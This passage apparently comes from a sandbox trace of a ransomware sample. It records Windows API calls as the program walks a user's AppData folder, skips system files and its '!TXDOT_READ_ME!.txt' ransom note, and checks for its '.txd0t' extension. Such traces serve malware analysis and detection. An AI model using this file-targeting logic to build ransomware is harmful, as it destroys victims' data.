psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.250] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.250] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt" [0119.250] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.250] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.250] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.250] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcddced0, ftCreationTime.dwHighDateTime=0x1d5e5d7, ftLastAccessTime.dwLowDateTime=0x2a0da5f0, ftLastAccessTime.dwHighDateTime=0x1d5edc7, ftLastWriteTime.dwLowDateTime=0x501c3632, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7888, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="0R6G zd4i6nTDGa8VNm.png.txd0t", cAlternateFileName="0R6GZD~1.TXD")) returned 1 [0119.250] StrCmpW (psz1="0R6G zd4i6nTDGa8VNm.png.txd0t", psz2=".") returned 1 [0119.250] StrCmpW (psz1="0R6G zd4i6nTDGa8VNm.png.txd0t", psz2="..") returned 1 [0119.250] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.250] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.250] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="0R6G zd4i6nTDGa8VNm.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png.txd0t" [0119.250] PathFindExtensionW (pszPath="0R6G zd4i6nTDGa8VNm.png.txd0t") returned=".txd0t" [0119.250] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.250] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x486e5280, ftCreationTime.dwHighDateTime=0x1d5e57d, ftLastAccessTime.dwLowDateTime=0x52499ce0, ftLastAccessTime.dwHighDateTime=0x1d5e381, ftLastWriteTime.dwLowDateTime=0x501c3632, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11832, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3QaEJDzGG8TQ5z.rtf.txd0t", cAlternateFileName="3QAEJD~1.TXD")) returned 1 [0119.250] StrCmpW (psz1="3QaEJDzGG8TQ5z.rtf.txd0t", psz2=".") returned 1 [0119.250] StrCmpW (psz1="3QaEJDzGG8TQ5z.rtf.txd0t", psz2="..") returned 1 [0119.250] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.251] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.251] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="3QaEJDzGG8TQ5z.rtf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf.txd0t" [0119.251] PathFindExtensionW (pszPath="3QaEJDzGG8TQ5z.rtf.txd0t") returned=".txd0t" [0119.251] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.251] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b42a0, ftCreationTime.dwHighDateTime=0x1d5ed72, ftLastAccessTime.dwLowDateTime=0xbc7247a0, ftLastAccessTime.dwHighDateTime=0x1d5ed6a, ftLastWriteTime.dwLowDateTime=0x501c3632, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcd4d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5hVk52ujjP2vb7epC7.xls.txd0t", cAlternateFileName="5HVK52~1.TXD")) returned 1 [0119.251] StrCmpW (psz1="5hVk52ujjP2vb7epC7.xls.txd0t", psz2=".") returned 1 [0119.251] StrCmpW (psz1="5hVk52ujjP2vb7epC7.xls.txd0t", psz2="..") returned 1 [0119.251] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.251] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.251] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="5hVk52ujjP2vb7epC7.xls.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls.txd0t" [0119.251] PathFindExtensionW (pszPath="5hVk52ujjP2vb7epC7.xls.txd0t") returned=".txd0t" [0119.251] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.251] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0605780, ftCreationTime.dwHighDateTime=0x1d5ed04, ftLastAccessTime.dwLowDateTime=0x3c594790, ftLastAccessTime.dwHighDateTime=0x1d5e4c2, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x253f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8zg7I2Esm.docx.txd0t", cAlternateFileName="8ZG7I2~1.TXD")) returned 1 [0119.251] StrCmpW (psz1="8zg7I2Esm.docx.txd0t", psz2=".") returned 1 [0119.251] StrCmpW (psz1="8zg7I2Esm.docx.txd0t", psz2="..") returned 1 [0119.251] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.251] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.251] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="8zg7I2Esm.docx.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx.txd0t" [0119.251] PathFindExtensionW (pszPath="8zg7I2Esm.docx.txd0t") returned=".txd0t" [0119.251] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.251] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0119.251] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0119.251] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0119.251] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.251] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.251] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Adobe", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" [0119.251] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0119.251] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.251] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0119.251] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.251] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Adobe" [0119.251] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c41ba0, ftCreationTime.dwHighDateTime=0x1d5e0f5, ftLastAccessTime.dwLowDateTime=0x182069d0, ftLastAccessTime.dwHighDateTime=0x1d5e3b9, ftLastWriteTime.dwLowDateTime=0x5025be8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13c0b, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aNTcu_iQUI-LLKOyho.avi.txd0t", cAlternateFileName="ANTCU_~1.TXD")) returned 1 [0119.251] StrCmpW (psz1="aNTcu_iQUI-LLKOyho.avi.txd0t", psz2=".") returned 1 [0119.251] StrCmpW (psz1="aNTcu_iQUI-LLKOyho.avi.txd0t", psz2="..") returned 1 [0119.251] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.252] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.252] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="aNTcu_iQUI-LLKOyho.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi.txd0t" [0119.252] PathFindExtensionW (pszPath="aNTcu_iQUI-LLKOyho.avi.txd0t") returned=".txd0t" [0119.282] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.282] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b9a3ff0, ftCreationTime.dwHighDateTime=0x1d5eeb7, ftLastAccessTime.dwLowDateTime=0x91ed70, ftLastAccessTime.dwHighDateTime=0x1d5e832, ftLastWriteTime.dwLowDateTime=0x50282069, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xfd3f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="c39tCHh.avi.txd0t", cAlternateFileName="C39TCH~1.TXD")) returned 1 [0119.282] StrCmpW (psz1="c39tCHh.avi.txd0t", psz2=".") returned 1 [0119.282] StrCmpW (psz1="c39tCHh.avi.txd0t", psz2="..") returned 1 [0119.282] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.282] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.282] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="c39tCHh.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi.txd0t" [0119.282] PathFindExtensionW (pszPath="c39tCHh.avi.txd0t") returned=".txd0t" [0119.282] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.282] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a7d2dc0, ftCreationTime.dwHighDateTime=0x1d5e3ad, ftLastAccessTime.dwLowDateTime=0x40bcd7c0, ftLastAccessTime.dwHighDateTime=0x1d5e68e, ftLastWriteTime.dwLowDateTime=0x50282069, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xe2cc, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="CjrpV8NWiwYR.png.txd0t", cAlternateFileName="CJRPV8~1.TXD")) returned 1 [0119.282] StrCmpW (psz1="CjrpV8NWiwYR.png.txd0t", psz2=".") returned 1 [0119.283] StrCmpW (psz1="CjrpV8NWiwYR.png.txd0t", psz2="..") returned 1 [0119.283] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.283] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.283] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="CjrpV8NWiwYR.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png.txd0t" [0119.283] PathFindExtensionW (pszPath="CjrpV8NWiwYR.png.txd0t") returned=".txd0t" [0119.283] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.283] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e009a0, ftCreationTime.dwHighDateTime=0x1d5e9e5, ftLastAccessTime.dwLowDateTime=0x8b112b50, ftLastAccessTime.dwHighDateTime=0x1d5ebd4, ftLastWriteTime.dwLowDateTime=0x502a827b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x130a9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="CUCgHoAM.wav.txd0t", cAlternateFileName="CUCGHO~1.TXD")) returned 1 [0119.283] StrCmpW (psz1="CUCgHoAM.wav.txd0t", psz2=".") returned 1 [0119.283] StrCmpW (psz1="CUCgHoAM.wav.txd0t", psz2="..") returned 1 [0119.283] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.283] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.283] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="CUCgHoAM.wav.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav.txd0t" [0119.283] PathFindExtensionW (pszPath="CUCgHoAM.wav.txd0t") returned=".txd0t" [0119.283] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.283] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1b97a70, ftCreationTime.dwHighDateTime=0x1d5eff4, ftLastAccessTime.dwLowDateTime=0xc073c5d0, ftLastAccessTime.dwHighDateTime=0x1d5e78f, ftLastWriteTime.dwLowDateTime=0x502a827b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15407, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="cv28-Ixq4k3KD.mkv.txd0t", cAlternateFileName="CV28-I~1.TXD")) returned 1 [0119.283] StrCmpW (psz1="cv28-Ixq4k3KD.mkv.txd0t", psz2=".") returned 1 [0119.283] StrCmpW (psz1="cv28-Ixq4k3KD.mkv.txd0t", psz2="..") returned 1 [0119.283] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.283] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.283] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="cv28-Ixq4k3KD.mkv.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv.txd0t" [0119.283] PathFindExtensionW (pszPath="cv28-Ixq4k3KD.mkv.txd0t") returned=".txd0t" [0119.283] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.283] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4194c0, ftCreationTime.dwHighDateTime=0x1d5e2dd, ftLastAccessTime.dwLowDateTime=0xc7d533d0, ftLastAccessTime.dwHighDateTime=0x1d5e515, ftLastWriteTime.dwLowDateTime=0x502ce4a2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12720, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="D3INp6Ei.xlsx.txd0t", cAlternateFileName="D3INP6~1.TXD")) returned 1 [0119.283] StrCmpW (psz1="D3INp6Ei.xlsx.txd0t", psz2=".") returned 1 [0119.283] StrCmpW (psz1="D3INp6Ei.xlsx.txd0t", psz2="..") returned 1 [0119.283] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.283] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.283] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="D3INp6Ei.xlsx.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx.txd0t" [0119.283] PathFindExtensionW (pszPath="D3INp6Ei.xlsx.txd0t") returned=".txd0t" [0119.283] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.283] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5695d100, ftCreationTime.dwHighDateTime=0x1d5edff, ftLastAccessTime.dwLowDateTime=0xa693630, ftLastAccessTime.dwHighDateTime=0x1d5e915, ftLastWriteTime.dwLowDateTime=0x502f470a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1697c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="DRvrEGQ_bV7.png.txd0t", cAlternateFileName="DRVREG~1.TXD")) returned 1 [0119.283] StrCmpW (psz1="DRvrEGQ_bV7.png.txd0t", psz2=".") returned 1 [0119.283] StrCmpW (psz1="DRvrEGQ_bV7.png.txd0t", psz2="..") returned 1 [0119.283] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.284] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.284] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="DRvrEGQ_bV7.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png.txd0t" [0119.284] PathFindExtensionW (pszPath="DRvrEGQ_bV7.png.txd0t") returned=".txd0t" [0119.284] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.284] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d3f580, ftCreationTime.dwHighDateTime=0x1d5ee6c, ftLastAccessTime.dwLowDateTime=0xa2661670, ftLastAccessTime.dwHighDateTime=0x1d5e400, ftLastWriteTime.dwLowDateTime=0x502f470a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1448f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="DVmE9qFtb1fE2H.bmp.txd0t", cAlternateFileName="DVME9Q~1.TXD")) returned 1 [0119.284] StrCmpW (psz1="DVmE9qFtb1fE2H.bmp.txd0t", psz2=".") returned 1 [0119.284] StrCmpW (psz1="DVmE9qFtb1fE2H.bmp.txd0t", psz2="..") returned 1 [0119.284] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.284] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.284] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="DVmE9qFtb1fE2H.bmp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp.txd0t" [0119.284] PathFindExtensionW (pszPath="DVmE9qFtb1fE2H.bmp.txd0t") returned=".txd0t" [0119.284] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.284] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x811d38e0, ftCreationTime.dwHighDateTime=0x1d5e77a, ftLastAccessTime.dwLowDateTime=0x6095b3a0, ftLastAccessTime.dwHighDateTime=0x1d5f093, ftLastWriteTime.dwLowDateTime=0x5031b768, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16161, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ET9_8drX4.bmp.txd0t", cAlternateFileName="ET9_8D~1.TXD")) returned 1 [0119.284] StrCmpW (psz1="ET9_8drX4.bmp.txd0t", psz2=".") returned 1 [0119.284] StrCmpW (psz1="ET9_8drX4.bmp.txd0t", psz2="..") returned 1 [0119.284] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.284] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.284] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="ET9_8drX4.bmp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp.txd0t" [0119.284] PathFindExtensionW (pszPath="ET9_8drX4.bmp.txd0t") returned=".txd0t" [0119.284] StrCmpW (psz1=".txd0t", 